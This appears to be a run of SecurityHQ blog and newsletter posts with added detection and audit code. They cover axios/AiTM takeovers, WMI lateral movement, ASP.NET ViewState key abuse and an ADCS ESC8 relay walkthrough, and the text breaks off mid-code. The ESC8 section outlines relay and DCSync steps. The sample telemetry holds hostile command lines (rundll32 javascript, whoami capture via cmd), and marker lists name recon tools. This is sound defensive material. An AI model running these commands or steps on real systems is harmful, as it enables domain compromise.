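The AzureHound User Agent rule in the Threat Detection Engineering section and the axios/1.13.1 takeover above are two instances of the same check: the client that presented the credentials is not a browser, and the sign-in properties do not match the user's baseline. The following is an added worked example, not SecurityHQ's rule implementation. The sign-in records and per-user baselines are constructed; the user-agent marker lists are assumptions, including the assumption that AzureHound identifies itself with an "azurehound" user agent, and the P2/P3 priorities follow the rule names on this page.

```python
"""Classify Microsoft 365 / Entra ID sign-ins by client user agent and
sign-in properties, covering both the AzureHound rule and the axios/1.13.1
account takeover.

Added example, not SecurityHQ's rule implementation. The sign-in records
and per-user baselines are constructed; the user-agent markers are
assumptions (including that AzureHound identifies itself as 'azurehound').
"""
import re

RECON_TOOL_MARKERS = ("azurehound", "roadtools", "roadrecon")
SCRIPTED_CLIENT_MARKERS = ("axios/", "python-requests", "go-http-client", "curl/", "okhttp")
BROWSER_RE = re.compile(r"Mozilla/5\.0 \(.*\).*(Chrome|Firefox|Safari|Edg)/")

USER_BASELINE = {   # assumed: countries and ASNs learned from each user's prior sign-ins
    "alice@example.com": {"countries": {"GB"}, "asns": {"AS2856"}},
    "svc-reporting@example.com": {"countries": {"GB"}, "asns": {"AS8075"}},
}

CHROME_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0 Safari/537.36"
IPHONE_UA = "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1"


def signin(user, ua, ip, country, asn, app, mfa, interactive=True):
    return {"user": user, "ua": ua, "ip": ip, "country": country, "asn": asn,
            "app": app, "mfa": mfa, "interactive": interactive}


# Constructed sample sign-ins, not real tenant data.
SIGNINS = [
    signin("alice@example.com", CHROME_UA, "203.0.113.5", "GB", "AS2856", "Office 365", "success"),
    signin("alice@example.com", "axios/1.13.1", "198.51.100.23", "US", "AS14061", "Office 365 Exchange Online", "success"),
    signin("svc-reporting@example.com", "azurehound/v2.2.0", "192.0.2.9", "GB", "AS8075", "Microsoft Graph",
           "not_required", interactive=False),
    signin("bob@example.com", IPHONE_UA, "203.0.113.77", "GB", "AS2856", "Outlook", "success"),
]


def classify_user_agent(ua):
    low = ua.lower()
    if any(m in low for m in RECON_TOOL_MARKERS):
        return "recon_tool"
    if any(m in low for m in SCRIPTED_CLIENT_MARKERS):
        return "scripted_client"
    if BROWSER_RE.search(ua):
        return "browser"
    return "unknown"


def evaluate(rec, baseline=USER_BASELINE):
    """Return (priority, reasons); priority None means nothing to raise."""
    kind = classify_user_agent(rec["ua"])
    if kind == "recon_tool":
        return "P2", ["recon_tool_user_agent"]
    base = baseline.get(rec["user"])
    unfamiliar = bool(base) and (rec["country"] not in base["countries"] or rec["asn"] not in base["asns"])
    reasons = []
    if kind != "browser" and rec["interactive"]:
        reasons.append("non_browser_interactive_signin")
    if unfamiliar:
        reasons.append("unfamiliar_location_or_asn")
    if reasons and rec["mfa"] == "success":
        reasons.append("mfa_satisfied_anyway")   # a passed MFA prompt does not clear a scripted client
    if "non_browser_interactive_signin" in reasons and unfamiliar:
        return "P2", reasons
    return ("P3", reasons) if reasons else (None, [])


def triage(signins):
    """Sign-ins worth an analyst's attention, with priority and reasons."""
    out = []
    for rec in signins:
        priority, reasons = evaluate(rec)
        if priority:
            out.append({"user": rec["user"], "ua": rec["ua"], "priority": priority, "reasons": reasons})
    return out


if __name__ == "__main__":
    for item in triage(SIGNINS):
        print(item)
```

The "mfa_satisfied_anyway" reason is deliberate: as the investigation above notes, MFA completing over SMS does not make an axios sign-in from a new ASN legitimate, and an AiTM proxy will satisfy the prompt on the attacker's behalf. The preventive counterpart is a Conditional Access or Defender for Cloud Apps policy that blocks these user agents outright, as covered in the referenced SecurityHQ blog.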

Suspicious Remote Command Execution and Lateral Movement Activity.

Detection: An incident was escalated indicating suspicious lateral movement activity and remote command execution on a device. The alert identified 'SuspRemoteCmdCommand' malware associated with WMI process execution originating from an external IP address.

Investigation: Microsoft Defender for Endpoint (MDE) detected suspicious WMI-related activity involving the legitimate WmiPrvSE.exe process executed with the unusual command line “-secured -Embedding.” Although WmiPrvSE.exe is commonly used by Windows, the behavior was flagged due to the associated detection of SuspRemoteCmdCommand, suggesting potential remote command execution.

Shortly afterward, a secondary process executed via cmd.exe, running quietly to capture the output of the whoami command to a temporary file—an action typically associated with attacker reconnaissance following lateral movement. The event also correlated with a prior Lateral Movement Detected alert on the same host, reinforcing concerns of unauthorized remote execution.

During behavior monitoring, the threat was identified and terminated promptly. The active threat was classified as Behavior:Win32/SuspRemoteCmdCommand.SA, operating within the WmiPrvSE.exe process.

Additional telemetry captured WUDFHost.exe activity near the same timeframe, indicating possible chained system operations triggered during the malicious sequence. Threat intelligence enrichment further validated risk indicators, as the external IP, and associated file hash were flagged by multiple security sources, supporting Defender’s classification of the activity as malicious.

Remediation Actions: The malicious process was successfully blocked and terminated by Microsoft Defender. No further suspicious activity was observed. All identified IOCs were blocked. A full antivirus scan was performed on the host to ensure no residual malware components remain active.

Not many security solutions log command-line activity. An enterprise EDR solution, or a command-line auditing tool such as Sysmon, enables defenders and analysts to detect what is happening under the hood.
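Command-line visibility is what made both incidents on this page detectable: the nltest / rundll32 / wscript chain with the proxy registry change (INC #1460383 in the December newsletter) and WmiPrvSE.exe spawning cmd.exe to capture whoami output (the case above). The following is an added worked example, not Microsoft Defender's or SecurityHQ's detection logic: four rules over constructed process-creation and registry-set events in a Sysmon-like shape, plus a per-host evaluator that escalates when several distinct rules fire inside one window, or when the single rule that fires already implies remote execution. The window, the escalation threshold and the registry key list are assumptions.

```python
"""Process-telemetry rules for two living-off-the-land chains: nltest trust
enumeration, rundll32 running JavaScript and wscript changing proxy settings;
and WmiPrvSE.exe spawning cmd.exe to capture whoami output.

Added example, not Microsoft Defender's or SecurityHQ's detection logic.
Events are constructed in a Sysmon-like shape; thresholds are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def proc(ts, host, image, cmdline, parent):
    return {"type": "process", "ts": datetime.fromisoformat(ts), "host": host,
            "image": image.lower(), "cmdline": cmdline, "parent": parent.lower()}


def reg(ts, host, image, key, value):
    return {"type": "registry", "ts": datetime.fromisoformat(ts), "host": host,
            "image": image.lower(), "key": key, "value": value}


SYS32 = "C:\\Windows\\System32\\"
PROXY_KEY_SUFFIXES = ("\\internet settings\\proxyserver", "\\internet settings\\proxyenable",
                      "\\internet settings\\autoconfigurl")

# Constructed sample telemetry, not a real capture.
EVENTS = [
    proc("2025-12-08T14:00:00", "HOST-A", SYS32 + "nltest.exe", "nltest /domain_trusts", SYS32 + "cmd.exe"),
    proc("2025-12-08T14:01:10", "HOST-A", SYS32 + "rundll32.exe",
         'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";x=1', "C:\\Windows\\explorer.exe"),
    proc("2025-12-08T14:02:00", "HOST-A", SYS32 + "wscript.exe",
         "wscript.exe C:\\Users\\Public\\update.js", "C:\\Windows\\explorer.exe"),
    reg("2025-12-08T14:02:05", "HOST-A", SYS32 + "wscript.exe",
        "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer",
        "127.0.0.1:8080"),
    proc("2025-12-16T16:20:00", "HOST-B", SYS32 + "cmd.exe",
         "cmd.exe /Q /c whoami > C:\\Windows\\Temp\\out.tmp 2>&1", SYS32 + "wbem\\WmiPrvSE.exe"),
    proc("2025-12-09T10:00:00", "HOST-C", SYS32 + "nltest.exe", "nltest /domain_trusts",
         SYS32 + "WindowsPowerShell\\v1.0\\powershell.exe"),
]


def rule_domain_trust_enum(e):
    return e["type"] == "process" and e["image"].endswith("nltest.exe") and "/domain_trusts" in e["cmdline"].lower()


def rule_rundll32_javascript(e):
    return e["type"] == "process" and e["image"].endswith("rundll32.exe") and "javascript:" in e["cmdline"].lower()


def rule_wscript_proxy_change(e):
    return (e["type"] == "registry" and e["image"].endswith(("wscript.exe", "cscript.exe"))
            and e["key"].lower().endswith(PROXY_KEY_SUFFIXES))


def rule_wmi_spawned_recon(e):
    return (e["type"] == "process" and e["parent"].endswith("wmiprvse.exe") and e["image"].endswith("cmd.exe")
            and "whoami" in e["cmdline"].lower() and ">" in e["cmdline"])


RULES = {
    "domain_trust_enumeration": rule_domain_trust_enum,
    "rundll32_javascript": rule_rundll32_javascript,
    "wscript_proxy_change": rule_wscript_proxy_change,
    "wmi_spawned_recon": rule_wmi_spawned_recon,
}
CRITICAL_RULES = {"wmi_spawned_recon"}   # severe on its own: remote execution has already happened


def evaluate(events, window=timedelta(minutes=30), escalate_at=2):
    """Per host: rules fired, most distinct rules inside one window, and a severity."""
    hits = defaultdict(list)
    for e in events:
        for name, rule in RULES.items():
            if rule(e):
                hits[e["host"]].append((e["ts"], name))
    verdicts = {}
    for host, fired in hits.items():
        fired.sort()
        best = max(len({n for t, n in fired if start <= t <= start + window}) for start, _ in fired)
        names = sorted({n for _, n in fired})
        major = best >= escalate_at or any(n in CRITICAL_RULES for n in names)
        verdicts[host] = {"rules": names, "distinct_in_window": best, "severity": "major" if major else "low"}
    return verdicts


if __name__ == "__main__":
    for host, verdict in evaluate(EVENTS).items():
        print(host, verdict)
```

HOST-A is escalated because three distinct techniques fire within two minutes, HOST-B because a cmd.exe child of the WMI provider host redirecting whoami output is the remote-execution footprint itself, while HOST-C's lone nltest from an administrator's PowerShell stays low. Every rule keys on the command line or the parent image, which is exactly the data a solution without command-line auditing never sees.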

Threat Hunting

SecurityHQ's Threat Hunting team focused on hunting threats in the cloud, where malicious or unauthorized activity most often stems from compromised credentials, misconfigured permissions or exploitation of vulnerable services, and can lead to privilege escalation, lateral movement and data exfiltration.

The objective of these hypotheses is to proactively detect, investigate, and respond to suspicious or unauthorized activities across cloud infrastructure that may indicate compromise, privilege escalation, data exfiltration, or other malicious behaviors — thereby reducing risk exposure and improving cloud security posture 

Notable Observations: Large-Scale Role Assumption & Privilege Probing: One of the customer environments showed an extremely high volume of AssumeRole operations, hinting at automation or scripted enumeration.

Key Observations:

  • Unknown external IPs performing API calls with repeated access denials.
  • Attempts to access sensitive resources or enumerate services.
  • Occasional rate-throttling events tied to high-volume API activity, suggesting automation.

Associated Risk: Likely indicators of scripted scanning, misconfigured integrations, or malicious reconnaissance.

EC2 & Compute Irregularities: Most environments showed no compute-based compromise activity, but a minority revealed abnormalities.

Key Observations:

  • Large EC2 instances running unexpectedly.
  • Rate-limiting and throttling events associated with compute services.

Associated Risks: No confirmed persistence, but compute resources are being probed or misused in some tenants.

Recommendations: Based on the combined threat landscape observed across all customers, the following global recommendations apply:

  • Enforce Strong Authentication Immediately.
  • Remove legacy IAM accounts where possible.
  • Restrict console access by IP through IAM conditions or network controls.
  • Harden IAM Roles & Reduce Privilege Exposure.
  • Limit access to Secrets Manager and KMS to essential roles only.
  • Lock Down S3 Storage by enabling Block Public Access globally.
  • Conduct a Global Access Key Audit.

Incident Response – Success Story

Incident Story: ASP.NET Machine Key Exploitation

One of SecurityHQ's customers recently faced a critical web server compromise originating from a long-standing weakness in Microsoft's ASP.NET framework. Threat actors have begun weaponizing publicly exposed ASP.NET machine keys, some of which have been available online since as early as 2003, to hijack Internet Information Services (IIS) servers and deploy malicious modules.

IR Observations: Attack Narrative
During the investigation, it was discovered that threat actors exploited ASP.NET ViewState deserialization flaws. By obtaining publicly available machine keys, they could tamper with serialized ViewState data, a component used to maintain state information across web requests. Because these machine keys are the cryptographic secrets that validate and protect ViewState content, possessing them allowed the attackers to forge ViewState payloads that pass MAC validation and execute arbitrary code on the targeted servers, without any authentication credentials.

Microsoft had previously identified over 3,000 exposed machine keys across open repositories, forums, and developer sites, creating a wide landscape of potential victims. Many of these keys belonged to applications built on .NET Framework versions prior to 4.5, which allow ViewState MAC validation to be disabled and lack the hardened ViewState handling introduced in later versions.

Impact Analysis

Once the IIS servers were compromised, attackers loaded malicious IIS modules to maintain persistence and intercept incoming HTTP requests. These modules enabled:

  • Command execution under IIS worker process privileges.
  • Credential harvesting from memory and web traffic.
  • Data exfiltration through legitimate web communications.
  • Possible lateral movement within the network via trusted server accounts.

The stealth of this method made detection difficult, as all activities appeared as legitimate IIS traffic and processes.

Root Cause

  • Use of outdated ASP.NET versions (< 4.5) lacking secure ViewState handling.
  • Disabled or weak MAC validation for ViewState integrity.
  • Reuse or exposure of machine keys in public repositories and code-sharing platforms.
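All three root causes are visible in web.config, so they can be checked mechanically before an attacker does it for you. The script below is an added example (not SecurityHQ's or Microsoft's code): it audits the `<system.web>` section for a disabled ViewState MAC, a weak validation algorithm, a runtime target below 4.5, and a `validationKey` that appears in a list of known-leaked keys, and it generates a replacement `<machineKey>` in the sizes ASP.NET expects (64 bytes for HMACSHA256, 32 bytes for AES). The weak web.config and the "known leaked key" set are constructed stand-ins; Microsoft's real list of disclosed keys is not reproduced here.

```python
"""Audit an ASP.NET web.config for the ViewState weaknesses listed above and mint a replacement key.

Added example, not SecurityHQ's or Microsoft's code. The web.config and the
"known leaked key" set are constructed stand-ins.
"""
import secrets
import xml.etree.ElementTree as ET

# Constructed: a deliberately weak configuration showing every root cause at once.
WEAK_VALIDATION_KEY = "0123456789ABCDEF" * 8   # 64 bytes of obviously fake hex
WEAK_DECRYPTION_KEY = "FEDCBA9876543210" * 3   # 24 bytes (3DES), obviously fake
WEAK_WEB_CONFIG = f"""<?xml version="1.0"?>
<configuration>
  <system.web>
    <httpRuntime targetFramework="4.0" />
    <pages enableViewStateMac="false" viewStateEncryptionMode="Never" />
    <machineKey validationKey="{WEAK_VALIDATION_KEY}"
                decryptionKey="{WEAK_DECRYPTION_KEY}"
                validation="SHA1" decryption="Auto" />
  </system.web>
</configuration>
"""

KNOWN_LEAKED_VALIDATION_KEYS = {WEAK_VALIDATION_KEY}   # constructed stand-in for the public list
WEAK_VALIDATION_ALGORITHMS = {"MD5", "SHA1", "3DES", "AES"}


def _child(element, tag):
    return next((c for c in element if c.tag == tag), None)


def _version(text):
    """'4.7.2' -> (4, 7); None or garbage -> None."""
    try:
        return tuple(int(p) for p in text.split(".")[:2])
    except (AttributeError, ValueError):
        return None


def audit_machine_key(config_xml, leaked_keys=KNOWN_LEAKED_VALIDATION_KEYS):
    """Return severity-prefixed findings for the <system.web> ViewState settings."""
    findings = []
    system_web = _child(ET.fromstring(config_xml), "system.web")
    if system_web is None:
        return ["HIGH: no <system.web> section found"]

    runtime = _child(system_web, "httpRuntime")
    target = _version(runtime.get("targetFramework")) if runtime is not None else None
    # Without targetFramework >= 4.5 the runtime keeps the pre-4.5 ViewState behaviour.
    if target is None or target < (4, 5):
        findings.append("HIGH: httpRuntime targetFramework missing or below 4.5")

    pages = _child(system_web, "pages")
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        findings.append('CRITICAL: enableViewStateMac="false" turns off ViewState MAC validation')

    machine_key = _child(system_web, "machineKey")
    if machine_key is not None:
        algorithm = machine_key.get("validation", "HMACSHA256").upper()
        if algorithm in WEAK_VALIDATION_ALGORITHMS:
            findings.append(f'HIGH: validation="{algorithm}" is weak; use HMACSHA256 or stronger')
        key = machine_key.get("validationKey", "").upper()
        if key in leaked_keys:
            findings.append("CRITICAL: validationKey matches a publicly disclosed key; rotate now")
        elif key and not key.startswith("AUTOGENERATE"):
            findings.append("INFO: static validationKey present; confirm it was generated privately")
    return findings


def generate_machine_key():
    """Fresh keys in the sizes ASP.NET expects: 64 bytes for HMACSHA256, 32 bytes for AES-256."""
    return {
        "validationKey": secrets.token_hex(64).upper(),
        "decryptionKey": secrets.token_hex(32).upper(),
        "validation": "HMACSHA256",
        "decryption": "AES",
    }


def render_machine_key(key):
    return ('<machineKey validationKey="{validationKey}" decryptionKey="{decryptionKey}" '
            'validation="{validation}" decryption="{decryption}" />').format(**key)


def build_hardened_config(key=None):
    """The corrected web.config: MAC on, ViewState encrypted, modern runtime, fresh keys."""
    key = key or generate_machine_key()
    return f"""<?xml version="1.0"?>
<configuration>
  <system.web>
    <httpRuntime targetFramework="4.8" />
    <pages enableViewStateMac="true" viewStateEncryptionMode="Always" />
    {render_machine_key(key)}
  </system.web>
</configuration>
"""
```

Running `audit_machine_key(WEAK_WEB_CONFIG)` yields two CRITICAL and two HIGH findings; the hardened configuration only produces the informational note that a static key is present, which is expected on a web farm where every node must share the same key. Rotating the key invalidates every outstanding ViewState and forms-authentication ticket, so schedule it, and remember that a key that was ever committed to a repository stays compromised no matter how private the repository later becomes.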

Conclusion

The exploitation of legacy ASP.NET configurations through leaked machine keys highlights the persistent risk posed by long-standing insecure settings and public code exposure. By promptly rotating the machine keys, enforcing ViewState MAC validation, and upgrading to a modern framework (ASP.NET 4.8 adds AMSI integration), the organisation restored the integrity of its web applications and closed this vector.

Reference: https://www.microsoft.com/en-us/security/blog/2025/02/06/code-injection-attacks-using-publicly-disclosed-asp-net-machine-keys/

The post Managed Defense Threat Insights: November 2025 Newsletter appeared first on SecurityHQ.

Adaptive Defense: How Cloud App Policies Can Block Malicious User Agents https://www.securityhq.com/blog/adaptive-defense-how-cloud-app-policies-can-block-malicious-user-agents/ Mon, 16 Jun 2025 09:57:58 +0000 https://www.securityhq.com/?p=12836

Overview: Microsoft 365 Apps

Many organizations seek to block malicious user agents and prevent scripted or unauthorized programmatic access to Microsoft 365. Adversary-in-the-Middle (AiTM) attacks are on the rise: they intercept and forward authentication traffic in real time and so circumvent multi-factor authentication (MFA) by capturing the resulting session. A significant development is the use of ordinary HTTP client libraries as the user agent for this activity, such as Axios, a JavaScript-based HTTP client, which attackers use to replicate browser activity and take over user sessions.

With these tools, attackers can:

  • Automate the collection of credentials and replay of sessions
  • Bypass basic browser fingerprinting techniques
  • Launch large-scale attacks with minimal manual effort

Although detection strategies like monitoring user-agent strings or identifying unusual geolocation patterns are available, there is a lack of comprehensive guidance on countering these specific threats. Conventional security measures often fail to detect axios-driven requests that closely resemble genuine user actions.

As a result, organizations are exposed to risks including:

  • Session hijacking, even when MFA is enabled
  • Challenges in distinguishing automated agents from real users
  • Ongoing unauthorized access after initial authentication

This blog underscores the urgent need to block malicious user agents through adaptive session policies and advanced behavior-based security in Microsoft 365.

Prerequisites

  • Microsoft 365 E5 license: required for Conditional Access App Control and MDCA session control.
  • Microsoft Defender for Cloud Apps: must be enabled.
  • Admin permissions: you must be an Administrator or Security Administrator in Entra ID (Azure AD).
  • Pilot group: test with a small group before full deployment.

Step-by-Step Configuration

Enable Microsoft Defender for Cloud Apps

Microsoft Defender for Cloud Apps (MDCA) is a security tool that provides visibility and control over user sessions in SaaS applications. It acts as a reverse proxy when Conditional Access routes a user’s traffic through it.

  1. Go to Microsoft 365 Defender Portal
  2. Navigate to:
    Settings → Microsoft Defender for Cloud Apps → Connected Apps → Conditional Access App Control apps
  3. Ensure the Microsoft 365 apps are listed as in Fig. 3.1. If they are not, create the Conditional Access policy described in the next section (Fig. 3.2) so that requests are routed to Defender for Cloud Apps.
Fig. 3.1 Conditional Access App Control Apps

Create Conditional Access for Route Traffic to MDCA

Conditional Access App Control sends the session through the MDCA proxy where session inspection happens. This is the foundation for blocking based on the User-Agent string.

Go to Azure Portal → Microsoft Entra ID → Conditional Access

Click + New Policy

Configure the following settings:

Fig 3.2 Conditional Policy

Save and apply the policy.

Trigger MDCA Session Routing (App Detection)

After the CA policy is active, the user must log into the app (e.g., Outlook) to trigger MDCA to detect and begin monitoring the app.

  1. Open a private/incognito browser window.
  2. Visit Outlook or Teams.
  3. Log in with a test account.
  4. Wait 1–2 minutes.
  5. Go to: Cloud Apps → Settings → Connected Apps → Conditional Access App Control apps
  6. Confirm that apps such as Office 365, Teams, or Exchange Online appear as Monitored.

Note: If not detected, recheck your Conditional Access policy and retry in incognito mode.

Create MDCA Session Policy to Block Axios

This policy inspects live sessions and blocks any that match certain criteria — in this case, when the User-Agent string contains “axios”.

  1. In the MDCA portal → Control → Access policies → + Create policy.
  2. Configure the policy so that it matches sessions whose User-Agent string contains “axios” and set the action to Block.

Click Create

This will block any Axios-based request to Office 365 apps. Note that the User-Agent header is client-controlled: a policy keyed on it stops opportunistic tooling, not an attacker who rewrites the string, so treat a match as one signal among several.
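To see why the user-agent match is only one layer, the added example below (not SecurityHQ or Microsoft code) runs two checks over sign-in events whose field names follow the Entra ID sign-in log (createdDateTime, userPrincipalName, ipAddress, userAgent, sessionId): the same substring match the policy above performs, and a session-replay check that fires when one sessionId reappears from a different IP address shortly after the interactive login, which catches an AiTM replay regardless of the User-Agent it sends. The events, user names and addresses are constructed.

```python
"""Flag scripted clients and replayed sessions in Microsoft 365 sign-in events.

Added example, not SecurityHQ or Microsoft code. Field names follow the
Entra ID sign-in log; the events themselves are constructed.
"""
from datetime import datetime, timedelta

# User-Agent fragments of scripted HTTP clients; "axios" is the one the
# policy above blocks. The header is client-controlled, so a match is a
# signal, not proof.
AUTOMATION_CLIENT_MARKERS = ("axios", "python-requests", "go-http-client", "curl/", "okhttp")

SAMPLE_EVENTS = [  # constructed
    {"createdDateTime": "2025-06-01T08:00:00", "userPrincipalName": "bob@contoso.example",
     "ipAddress": "203.0.113.10", "sessionId": "s-1",
     "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/125.0 Safari/537.36"},
    {"createdDateTime": "2025-06-01T08:03:00", "userPrincipalName": "bob@contoso.example",
     "ipAddress": "198.51.100.7", "sessionId": "s-1", "userAgent": "axios/1.7.2"},
    {"createdDateTime": "2025-06-01T09:10:00", "userPrincipalName": "carol@contoso.example",
     "ipAddress": "203.0.113.22", "sessionId": "s-2",
     "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Edg/125.0"},
    {"createdDateTime": "2025-06-01T09:40:00", "userPrincipalName": "carol@contoso.example",
     "ipAddress": "203.0.113.22", "sessionId": "s-2",
     "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Edg/125.0"},
]


def is_automation_client(user_agent):
    ua = user_agent.lower()
    return any(marker in ua for marker in AUTOMATION_CLIENT_MARKERS)


def find_suspicious_sessions(events, replay_window=timedelta(hours=1)):
    """Return (user, sessionId, reason) alerts.

    Check 1: a scripted User-Agent anywhere in the session.
    Check 2: the same sessionId seen again from a different IP within
    replay_window of its first appearance, the shape of AiTM token replay.
    """
    alerts = []
    first_seen = {}  # sessionId -> (timestamp, ipAddress) of the first event
    for event in sorted(events, key=lambda e: e["createdDateTime"]):
        ts = datetime.fromisoformat(event["createdDateTime"])
        sid, user = event["sessionId"], event["userPrincipalName"]
        if is_automation_client(event["userAgent"]):
            alerts.append((user, sid, "scripted client user agent: " + event["userAgent"]))
        if sid not in first_seen:
            first_seen[sid] = (ts, event["ipAddress"])
            continue
        first_ts, first_ip = first_seen[sid]
        if event["ipAddress"] != first_ip and ts - first_ts <= replay_window:
            minutes = int((ts - first_ts).total_seconds() // 60)
            alerts.append((user, sid, f"session reused from {event['ipAddress']} "
                                      f"{minutes} min after login from {first_ip}"))
    return alerts
```

On the constructed events both alerts are raised for bob's session: the Axios client would be blocked by the session policy, and the reuse of the same session from a second address three minutes after the browser login would still be caught if the attacker had spoofed a browser User-Agent. In production, the IP comparison is better done on ASN or named location than on raw addresses to avoid alerting on mobile users changing networks.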

Blocking malicious user agents is just one layer of a broader adaptive defense strategy. As attackers evolve, organizations must go beyond detection and adopt real-time controls that secure sessions, user identities, and cloud interactions.

Learn how to take your security strategy further with SecurityHQ’s Adaptive Defense Solutions, built to identify, contain, and respond to threats at every stage of the attack lifecycle.

Security Abuse of Misconfigured Active Directory Certificate Services Continue https://www.securityhq.com/blog/security-abuse-of-misconfigured-active-directory-certificate-services-continue/ Fri, 03 Jan 2025 12:05:04 +0000 https://www.securityhq.com/?p=11661 Active Directory Certificate Services (ADCS) is a role in Microsoft Windows Server that provides the infrastructure for public key infrastructure (PKI). When misconfigured, ADCS can open doors for attackers to exploit weaknesses.

Active Directory Certificate Services (ADCS) is a role in Microsoft Windows Server that provides the infrastructure for public key infrastructure (PKI). It is used to create, manage, distribute, and revoke digital certificates. These certificates are used to secure communications, authenticate users or devices, and enforce security policies in an organization.

However, when misconfigured, ADCS can open doors for attackers to exploit weaknesses, leading to unauthorized access and privilege escalation.

How Can ADCS Become Vulnerable?

Unlike traditional threats, ADCS exploitation often begins with misconfigured certificate templates or weak HTTP-based enrollment methods. Once these are exploited, attackers can move laterally across the network, compromising critical systems and sensitive data.


Initially, the process begins with the client (user or computer) generating a public/private key pair. The client then sends a Certificate Signing Request (CSR) to the Certificate Authority (CA) server, which includes the public key and requested certificate details. The CA validates the request by checking if the certificate template settings permit the request, whether the certificate already exists, and if the client has the necessary permissions to enroll.

Figure 1: ADCS Client-to-Server Workflow, SecurityHQ

Upon successful validation, the CA uses its private key to sign and issue the certificate. The client stores the issued certificate in its Windows Certificate Store, enabling it to perform actions such as authentication, code signing, or secure communication as allowed by the certificate’s intended purpose.

Exploiting ESC8 – NTLM Relay Attack via AD CS Web Enrollment

Before exploring the exploitation of ESC8 (NTLM relay through AD CS web enrollment), it is important to understand how NTLM relay attacks work. NTLM relaying is a common technique threat actors use to take over identities.

It works in two steps. First, the attacker forces a victim to authenticate to an endpoint the attacker controls. Second, the attacker forwards that authentication exchange to a vulnerable target. Because the victim's password is never needed, the attacker can act as the victim on the target, gain access to systems, and potentially take over the network.

Figure 2: NTLM Relay Attack Flow, SecurityHQ

Active Directory Certificate Services (ADCS) provides an HTTP-based method for users and machines to enroll for certificates. When the web enrollment endpoints accept NTLM authentication over HTTP, without Extended Protection for Authentication (EPA) or a TLS requirement, they can be abused through NTLM relay: the attacker relays a legitimate user's or machine's authentication to the enrollment page and requests a certificate in that identity's name. This misconfiguration can lead to full domain compromise.

The widespread use of HTTP-based enrollment further increases the risk of exploitation. Security researchers refer to this specific vulnerability or misconfiguration in ADCS as ADCS ESC8.

How Can ADCS ESC8 be Exploited in 6 Steps?

In this instance, the attacker first needs to find the AD CS HTTP enrollment endpoint on the network, which can be enumerated with tools such as Certipy (a Python-based tool). Note that the attacker needs a foothold in the domain, but the credentials of an ordinary low-privileged domain user are all that is required to perform the attack.

Figure 3: ESC8 (NTLM Relay Attack via ADCS Web Enrollment), SecurityHQ

  1. Once the vulnerable endpoint (ADS01) is identified, the attacker uses an NTLM coercion method to make a domain controller initiate NTLM authentication to the attacker's host. Event Detection Point: on the domain controller, look for Windows Event ID 4776 where the account being validated is the domain controller's machine account (e.g. DC01$; the trailing $ marks a computer account) and the Source Workstation is not DC01 itself.
  2. The domain controller's NTLM authentication is relayed by the attacker's host (using a relay tool such as ntlmrelayx) to the vulnerable AD CS web enrollment endpoint.
  3. The URL “http://<Vulnerable_CA_Server>/certsrv/certfnsh.asp” is Microsoft's Certificate Services web interface, used for certificate enrollment; the “certfnsh.asp” page completes the certificate request and returns the issued certificate to the requester. Event Detection Point: look for HTTP traffic on port 80 directed to the ADCS server; the relayed session starts with a GET to /certsrv/.
  4. The attacker requests a certificate for the domain controller. Because the request arrives as an authenticated session for DC01$, ADCS issues a certificate for that account, which the attacker saves (e.g. DC01.pfx). Event Detection Point: Windows Event ID 4886 (certificate request received) and 4887 (request approved and certificate issued) with the domain controller account as requester; on the network, the request itself is a POST to certfnsh.asp.
  5. Using the certificate, the attacker requests a Kerberos TGT for the domain controller machine account through certificate-based pre-authentication (PKINIT). Event Detection Point: Windows Event ID 4768 for the domain controller account (e.g. DC01$) with the Certificate Information fields (issuer name, serial number) populated, originating from an IP address that is not a domain controller.
  6. With a TGT for DC01$ the attacker can authenticate as the domain controller anywhere in the domain, and tools such as Certipy can also recover the account's NT hash from the PKINIT exchange; either is enough to perform a DCSync attack and retrieve every password hash in the domain. Event Detection Point: Windows Event ID 4662 whose Properties include the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All control access rights.

Detect ADCS Abuse

To detect ADCS abuse, the following Windows event IDs need to be monitored:

  • Event ID 4776: The computer attempted to validate the credentials for an account. Logged on the domain controller whenever an account is validated with NTLM rather than Kerberos; a valuable indicator for Pass-the-Hash and, in this chain, for the relayed machine-account authentication.
  • Event ID 4886: Certificate Services received a certificate request. Monitor this event for certificate requests made in the name of a domain controller account.
  • Event ID 4887: Certificate Services approved a certificate request and issued a certificate. Monitor this event for ADCS issuing a certificate to such a requester.
  • Event ID 4768: A Kerberos authentication ticket (TGT) was requested. Monitor this event for a user or computer account authenticating to the domain, and in particular for certificate-based (PKINIT) requests for machine accounts from unexpected addresses.
  • Event ID 4662: An operation was performed on an object. Monitor this event for the replication control access rights, which indicate a DCSync attack retrieving credentials through DRSGetNCChanges (IDL_DRSGetNCChanges) requests.
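The five event IDs are far noisier individually than together, so the added example below (not SecurityHQ code) correlates them into the chain described in the six steps: it consumes events already parsed into dictionaries whose field names follow the Windows Security and CA audit schemas, tags each domain-controller account with the stages observed (NTLM validation from a foreign host, certificate requested and issued, PKINIT TGT from a non-DC address, directory replication) and alerts when enough stages line up, while any replication by a non-DC principal is alerted on immediately. The events, DC names and addresses are constructed; the replication-right GUIDs are the well-known Active Directory values.

```python
"""Correlate Windows events into an ESC8 (NTLM relay to AD CS web enrollment) chain.

Added example, not SecurityHQ code. Field names follow the Windows Security
and CA audit event schemas; the events, DC names and addresses are constructed.
"""
# Constructed environment facts: which machine accounts and addresses are DCs.
DC_ACCOUNTS = {"DC01$", "DC02$"}
DC_ADDRESSES = {"10.0.0.5", "10.0.0.6"}

# Control access rights that DCSync-style replication exercises (well-known GUIDs).
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
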